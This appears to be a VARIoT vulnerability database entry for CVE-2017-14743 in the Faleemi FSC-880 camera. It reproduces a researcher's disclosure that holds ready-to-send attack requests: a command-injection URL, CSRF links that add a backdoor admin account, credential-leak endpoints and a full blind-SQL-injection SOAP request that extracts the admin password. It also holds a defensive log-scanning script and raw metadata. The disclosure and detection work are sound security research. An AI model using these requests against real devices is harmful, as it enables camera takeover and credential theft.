
    VAR-201709-0746

    Vulnerability from variot - Updated: 2025-04-20 23:04

    Faleemi FSC-880 00.01.01.0048P2 devices allow unauthenticated SQL injection via the Username element in an XML document to /onvif/device_service, as demonstrated by reading the admin password. Faleemi FSC-880 contains an SQL injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Faleemi FSC-880 is a network camera product from Faleemi, USA. A SQL injection vulnerability exists in the Faleemi FSC-880 00.01.01.0048P2 release. This vulnerability can be exploited by a remote attacker to read the administrator password. Full disclosure is here: https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce

    ===

    Timeline:

    25 August 2017: the research was made
    29 August 2017: an email was sent to the vendor, but with no answer
    25 September 2017: public disclosure
    26 September 2017: assigned CVE-2017-14743
    

    https://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/

    Firmware: 00.01.01.0048P2 (2017-07-27)

    This camera has multiple security vulnerabilities, which can be exploited both locally and remotely. In particular, hardwired manufacturer DDNS and port-mapping to camera via upnp compatible router. Allowing for the discovered avoidance of authentication and RCE, this camera is an ideal candidate for another botnet such as Mirai.

    CVE-2017-14743

    Vulnerabilities

    RCE

    Works in stock firmware 00.01.01.0046 (E2017-03-**)

    In the latest firmware (00.01.01.0048P2 (2017-07-27)) this is fixed: ftp client is removed. It is not in processes and in file system, ostensibly because realization was altered.

    Remote code execution in admin panel in GET parameters of Ft server scenario

    http://IP/hy-cgi/ftp.cgi?cmd=setftpattr&ft_server=;RCE;&ftp_port==25&ft_username=&ft_password=&ft_dirname=

    RCE2 (LAN)

    During analysis and reversing of the firmware we found an undocumented function: it is possible to quite simply turn on telnet on the device:

    Turn on telnet on port 23 http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus&enable=1

    Check status http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus

    Password protected Telnet, same as on web panel but with one exception: telnet is not connected to upnp. This suggests that port is not accessible outside LAN.

    We have so far been unable to connect it because we have not found custom settings of doing so to upnp.

    enable upnp: http://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr&upnp_enable=1

    upnp status: http://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr&cmd=getupnpmap&cmd=getupnptmstatus

    Plaintext passwords

    User passwords are stored on the device in plaintext format in several locations simultaneously:

    /etc/webserver/lighttpd.user
    /mnt/mtd/db/ipcsys.db

    Passwords are synchronised when changed.

    Information Disclosure

    Prior 00.01.01.0048P2 (2017-07-27) - 0DAY

    Device Info: http://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo

    WIFI credentials leak: http://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr

    Current user credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo

    All users credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr

    Third Party DDNS credentials leak: http://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr

    Manufacturer's DDNS credentials leak: http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns

    SMTP settings and credentials leak: http://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr

    FTP settings and credentials leak: http://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr

    CSRF

    Prior 00.01.01.0048P2 (2017-07-27) - 0DAY

    http://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot
    http://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog
    http://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog
    http://192.168.0.100/hy-cgi/user.cgi?cmd=adduser&at_username=BACKDOOR_ADMIN&at_password=BACKDOOR_PASSWORD&at_rolename=admin

    All changes in camera settings go through GET commands and don't use CSRF tokens.

    The following functions can be executed remotely:

    Configure Camera
    Format SD card
    Delete Logs
    Steal image from camera
    

    These actions and commands can be executed from admin browser. The indecent hacker only needs to lure the admin to their page.

    Similar attacks on routers have been registered in the past: http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html

    And some more epic stuff

    Manufacturer's DDNS enumeration

    There are hardwired DDNS manufacturer settings found in the device. The device sends an http request using udp www.nwsvr1.com, and sends its internal address and admin web panel IP address to API http://www.nwsvr1.com/api/userip.asp

    The device we researched has DDNS name 009lfld.nwsvr1.com. Knowing that device names are generated automatically, it is possible to enumerate the entire range of names using a mask 00\d[a-z]{4}.nwsvr1.com and obtain a full list of devices in the network.

    We found a total of 758000 devices, which connected with this DDNS at least once in the past.

    These are cameras by different manufacturers, that are somehow related to each other.

    Around 3% of devices are in the network.

    HK 18.41%
    US 12.72%
    DE 9.94%
    ES 6.77%
    FR 5.66%
    AR 5.09%
    GB 5.00%
    DK 3.79%
    IT 3.34%
    PL 3.04%
    MX 1.90%
    CN 1.55%
    VN 1.53%
    JP 1.53%
    HU 1.40%
    CL 1.27%
    BR 1.20%
    TH 1.19%

    A little over 20% of all devices use a default password. Virtually all devices are accessible by ONVIF

    A similar number (20-25 thousand devices are online) are vulnerable to auth bypass via sqli.

    We have serious concerns that the DDNS password, which is hardwired into the device by the manufacturer, is incremental. This means that it is possible to reverse-calculate the password to the camera based on its DDNS name.

    This raises the risk of the password being hijacked if the IP cards are switched on DDNS server, then redirected the admin using a camera with a DDNS name and grabs the password using his own authentication form.

    Authorization bypass via blind SQLi

    Prior 00.01.01.0048P2 (2017-07-27) - 0DAY

    A device without authentication on web-port has an accessible endpoint by default /onvif/

    ONVIF is an API standard for such devices. WSDL can be downloaded from the official website (www.onvif.org).

    API uses authentication by tokens. Using this it is possible to obtain an admin password.

    Example of the exploit:

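    /* https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce */

    POST /onvif/device_service HTTP/1.1
    Content-Type: application/soap+xml
    Content-Length: 1076
    charset: utf-8
    Host: 192.168.0.100
    Connection: close

    <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
    <s:Header>
    <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
    <UsernameToken>
    <Username>adfgadfhart' AND 1=2 UNION SELECT 1,'admin',(select unicode(substr(C_PassWord, 2, 1)) from t_user limit 1 OFFSET 0),'remark'/*</Username>
    <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">UHZjybNG8udkMEflf+LjkCUmR88=</Password>
    <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">fDnW+mqvvsID/WJGNR6QWQ==</Nonce>
    <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-01-01T00:03:58.674Z</Created>
    </UsernameToken>
    </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/>
    </s:Body>
    </s:Envelope>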

    To do this, the date and time set in the device are needed because they are used to build the password field of the authentication token.

    We drafted this POC, which allows to extract from the camera a password and gain entry to the device using admin credentials.

    This research was made by IoTSploit Team. Feel free to contact us at oleg@iotsploit.co and visit our website at https://iotsploit.co/

    If you have any active contact with Faleemi, please, show them this report and we are ready to coop
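
A defender-side check for the request patterns listed in the advisory above, as an added example that is not part of the IoTSploit advisory or the VARIoT record: it scans web access-log lines for the `hy-cgi` commands named there and tests the Username of an ONVIF SOAP body against an allowlist. The combined-style log format, the sample lines, `other-site.example`, the sample SOAP body and the username allowlist are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qsl

# cmd values named in the advisory, grouped by CGI script, with the reason to alert.
WATCHED = {
    "ftp.cgi": {"setftpattr": "FTP settings change", "getftpattr": "FTP credentials read"},
    "factory_param.cgi": {"settelnetstatus": "telnet toggle",
                          "getddns": "manufacturer DDNS credentials read"},
    "net.cgi": {"setupnpattr": "UPnP settings change"},
    "user.cgi": {"adduser": "account creation", "getuserattr": "all users credentials read",
                 "checkuserinfo": "current user credentials read"},
    "log.cgi": {"deloperlog": "log deletion", "cleanlog": "log deletion"},
    "device.cgi": {"sysreboot": "reboot", "getdeviceinfo": "device info read"},
    "wifi.cgi": {"getwifiattr": "Wi-Fi credentials read"},
    "ddns.cgi": {"get3thddnsattr": "third-party DDNS credentials read"},
    "smtp.cgi": {"getsmtpattr": "SMTP credentials read"},
}
STATE_CHANGING = {"setftpattr", "settelnetstatus", "setupnpattr", "adduser",
                  "deloperlog", "cleanlog", "sysreboot"}
# Characters with no place in a hostname, port or directory value. Password fields
# may legitimately contain some of them, so treat those hits as lower confidence.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")
# Assumed log layout: "METHOD target HTTP/x" status size "referer" ...
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"')
USERNAME_OK = re.compile(r"[A-Za-z0-9_.@-]{1,64}")  # assumed allowlist, tune per site


def _host(url):
    """Hostname of a Referer value, or None when absent or unparsable."""
    try:
        return urlsplit(url).hostname
    except ValueError:
        return None


def inspect_request(target, referer, device_hosts):
    """Return findings for one request target such as /hy-cgi/ftp.cgi?cmd=..."""
    findings = []
    url = urlsplit(target)
    if not url.path.startswith("/hy-cgi/"):
        return findings
    script = url.path.rsplit("/", 1)[-1]
    # A request may repeat cmd= several times, so every pair is examined.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "cmd" and value in WATCHED.get(script, {}):
            findings.append(f"{script}: {WATCHED[script][value]}")
            ref_host = _host(referer)
            # CSRF indicator: a state-changing GET that arrived from another site.
            if value in STATE_CHANGING and ref_host and ref_host not in device_hosts:
                findings.append(f"{script}: cross-site Referer {ref_host} on state-changing GET")
        elif key != "cmd" and SHELL_META.search(value):
            findings.append(f"{script}: shell metacharacter in {key}")
    return findings


def scan_log(lines, device_hosts):
    """Return (line_number, finding) pairs for access-log lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.search(line)
        if match:
            for finding in inspect_request(match["target"], match["referer"], device_hosts):
                hits.append((number, finding))
    return hits


def inspect_onvif_body(body):
    """Check the WS-Security Username of a captured SOAP body (bytes)."""
    if b"<!DOCTYPE" in body.upper():
        return ["DTD in SOAP body; not parsed"]  # avoid entity-expansion tricks
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["malformed XML"]
    findings = []
    for element in root.iter():
        if isinstance(element.tag, str) and element.tag.rsplit("}", 1)[-1] == "Username":
            if not USERNAME_OK.fullmatch(element.text or ""):
                findings.append("WS-Security Username outside allowlist")
    return findings


# Constructed sample data, not captured from a real device.
SAMPLE_LOG = [
    '192.168.0.50 - - [25/Sep/2017:10:00:01 +0000] "GET /hy-cgi/ftp.cgi?cmd=setftpattr&ft_server=;RCE;'
    '&ftp_port==25&ft_username=&ft_password=&ft_dirname= HTTP/1.1" 200 17 "-" "curl"',
    '192.168.0.20 - - [25/Sep/2017:10:00:05 +0000] "GET /hy-cgi/user.cgi?cmd=adduser&at_username=u1'
    '&at_password=p1&at_rolename=admin HTTP/1.1" 200 17 "http://other-site.example/page.html" "Mozilla/5.0"',
    '192.168.0.20 - - [25/Sep/2017:10:00:09 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.0.20 - - [25/Sep/2017:10:00:12 +0000] "GET /hy-cgi/log.cgi?cmd=cleanlog HTTP/1.1" 200 17 '
    '"http://192.168.0.100/" "Mozilla/5.0"',
]
SAMPLE_SOAP = b"""<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"><s:Header>
<Security xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken><Username>%s</Username></UsernameToken></Security></s:Header><s:Body/></s:Envelope>"""

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG, {"192.168.0.100"}):
        print(f"line {number}: {finding}")
    print(inspect_onvif_body(SAMPLE_SOAP % b"x' UNION SELECT 1 /*"))
```

The ONVIF Username travels in the POST body, so that check needs a reverse proxy or packet capture in front of the camera; access logs alone will not show it.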


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0746",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "fsc-880",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "faleemi",
            "version": "00.01.01.0048p2"
          },
          {
            "model": "fsc-880 00.01.01.0048p2",
            "scope": null,
            "trust": 0.6,
            "vendor": "faleemi",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:faleemi:fsc-880_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Oleg Puzanov",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "144392"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2017-14743",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2017-14743",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2017-31141",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "VHN-105496",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2017-14743",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-14743",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-14743",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-31141",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201709-1229",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-105496",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Faleemi FSC-880 00.01.01.0048P2 devices allow unauthenticated SQL injection via the Username element in an XML document to /onvif/device_service, as demonstrated by reading the admin password. Faleemi FSC-880 Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FaleemiFSC-880 is a network camera product from Faleemi, USA. A SQL injection vulnerability exists in the FaleemiFSC-88000.01.01.0048P2 release. This vulnerability can be exploited by a remote attacker to read the administrator password. Full disclosure is here: https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce \u003chttps://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce\u003e\n\n===\n\nTimeline:\n\n    25 August 2017: the research was made\n    29 August 2017: an email was sent to the vendor, but with no answer\n    25 September 2017: public disclosure\n    26 September 2017: assigned CVE-2017a14743\n\nhttps://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/\n\nFirmware: 00.01.01.0048P2 (2017-07-27)\n\nThis camera has multiple security vulnerabilities, which can be exploited both locally and remotely. In particular, hardwired manufacturer DDNS and port-mapping to camera via upnp compatible router. Allowing for the discovered avoidance of authentication and RCE, this camera is an ideal candidate for another botnet such as Mirai. \n\n\nCVE-2017a14743\n\nVulnerabilities\n\nRCE\n\nWorks in stock firmware 00.01.01.0046 (E2017a03-**)\n\nIn the latest firmware (00.01.01.0048P2 (2017a07a27)) this is fixedaaaftp client is removed. It is not in processes and in file systemaaaostensibly because realization was altered. 
\n\nRemote code execution in admin panel in GET parameters of Ft server scenario\n\nhttp://IP/hy-cgi/ftp.cgi?cmd=setftpattr\u0026ft_server=;RCE;\u0026ftp_port==25\u0026ft_username=\u0026ft_password=\u0026ft_dirname=\n\nRCE2 (LAN)\n\nDuring analysis and reversing of the firmware we found and undocumented functionaaait is possible to quite simply turn on telnet on the device:\n\nTurn on telnet on port 23\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus\u0026enable=1\n\nCheck status\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus\n\nPassword protected Telnetaaasame as on web panel but with one exception: telnet is not connected to upnp. This suggests that port is not accessible outside LAN. \n\nWe have so far been unable to connect it because we have not found custom settings of doing so to upnp. \n\nenable upnp:\nhttp://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr\u0026upnp_enable=1\n\nupnp status:\nhttp://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr\u0026cmd=getupnpmap\u0026cmd=getupnptmstatus\nPlaintext passwords\n\nUser passwords are stored on the device in plaintext format in several locations simultaneously:\n\n/etc/webserver/lighttpd.user\n/mnt/mtd/db/ipcsys.db\n\nPasswords are synchronised when changed. 
\nInformation Disclosure\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nDevice Info:\nhttp://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo\n\nWIFI credentials leak:\nhttp://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr\n\nCurrent user credentials leak:\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo\n\nAll users credentials leak:\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr\n\nThird Party DDNS credentials leak:\nhttp://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr\n\nManufactureras DDNS credentials leak:\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns\n\nSMTP settings and credentials leak:\nhttp://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr\n\nFTP settings and credentials leak:\nhttp://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr\n\nCSRF\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nhttp://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot\nhttp://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog\nhttp://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=adduser\u0026at_username=BACKDOOR_ADMIN\u0026at_password=BACKDOOR_PASSWORD\u0026at_rolename=admin\n\nAll changes in camera settings go through GET commands and donat use CSRF tokens. \n\nThe following functions can be executed remotely:\n\n    Configure Camera\n    Format SD card\n    Delete Logs\n    Steal image from camera\n\nThese actions and commands can be executed from admin browser. The indecent hacker only needs to lure the admin to their page. \n\nSimilar attacks on routers have been registered in the past: http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html\n\nAnd some more epic stuff\nManufactureras DDNS enumeration\n\nThere are hardwired DDNS manufacturer settings found in the device. The device sends an http request using udp www.nwsvr1.com, and sends its internal address and admin web panel IP address to API http://www.nwsvr1.com/api/userip.asp\n\nThe device we researched has DDNS name 009lfld.nwsvr1.com. 
Knowing that device names are generated automatically, it is possible to enumerate the entire range of names using a mask 00\\d[a-z]{4}.nwsvr1.com and obtain a full list of devices in the network. \n\nWe found a total of 758000 devices, which connected with this DDNS at least once in the past. \n\nThese are cameras by different manufacturers, that are somehow related to each other. \n\nAround 3% of devices are in the network.. \nHK 18.41%\nUS 12.72%\nDE 9.94%\nES 6.77%\nFR 5.66%\nAR 5.09%\nGB 5.00%\nDK 3.79%\nIT 3.34%\nPL 3.04%\nMX 1.90%\nCN 1.55%\nVN 1.53%\nJP 1.53%\nHU 1.40%\nCL 1.27%\nBR 1.20%\nTH 1.19%\n\nA little over 20% of all devices use a default password. Virtually all devices are accessible by ONVIF\n\nA similar number (20a25 thousands devices are online) are vulnerable to auth bypass via sqli. \n\nWe have serious concerns that the DDNs password, which is hardwired into the device by the manufacturer is incremental. This means that it is possible to reverse-calculate the password to the camera based on its DDNS name. \n\nThis raises the risk of the password being hijacked if the IP cards are switched on DDNS server, then redirected the admin using a camera with a DDNS name and grabs the password using his own authentication form. \n\nAuthorization bypass via blind SQLi\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nA device without authentication on web-port has an accessible endpoint by default /onvif/\n\nONVIF is an API standard for such devices. WSDL can be downloaded from the official website (www.onvif.org). \n\nAPI uses authentication by tokens. Using this it is possible to obtain an admin password. 
\n\nExample of the exploit:\n\n\n/* https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce */\n\nPOST /onvif/device_service HTTP/1.1\nContent-Type: application/soap+xml\nContent-Length: 1076\ncharset: utf-8\nHost: 192.168.0.100\nConnection: close\n\n\u003cs:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\"\u003e\n\u003cs:Header\u003e\n\u003cSecurity s:mustUnderstand=\"1\" xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"\u003e\n\u003cUsernameToken\u003e\n\u003cUsername\u003eadfgadfhart\u0027 AND 1=2 UNION SELECT 1,\u0027admin\u0027,(select unicode(substr(C_PassWord, 2, 1)) from t_user limit 1 OFF\nSET 0),\u0027remark\u0027/*\u003c/Username\u003e\n\u003cPassword Type=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest\"\u003eUHZj\nybNG8udkMEflf+LjkCUmR88=\u003c/Password\u003e\n\u003cNonce EncodingType=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary\"\u003efD\nnW+mqvvsID/WJGNR6QWQ==\u003c/Nonce\u003e\n\u003cCreated xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"\u003e1970-01-01T00:03:58\n.674Z\u003c/Created\u003e\n\u003c/UsernameToken\u003e\n\u003c/Security\u003e\n\u003c/s:Header\u003e\n\u003cs:Body xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\n\u003cGetDeviceInformation xmlns=\"http://www.onvif.org/ver10/device/wsdl\"/\u003e\n\u003c/s:Body\u003e\n\u003c/s:Envelope\u003e\n\n\nTo do this, the date and time set in the device are needed because they are used to build the password field of the authentication token. \n\nWe drafted this POC, which allows to extract from the camera a password and gain entry to the device using admin credentials. \n\nThis research was made by IoTSploit Team. 
Feel free to contact us at oleg@iotsploit.co and visit our website at https://iotsploit.co/\n\nIf you have any active contact with Faleemi, please, show them this report and we are ready to coop",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "PACKETSTORM",
            "id": "144392"
          }
        ],
        "trust": 2.34
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-105496",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-14743",
            "trust": 3.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
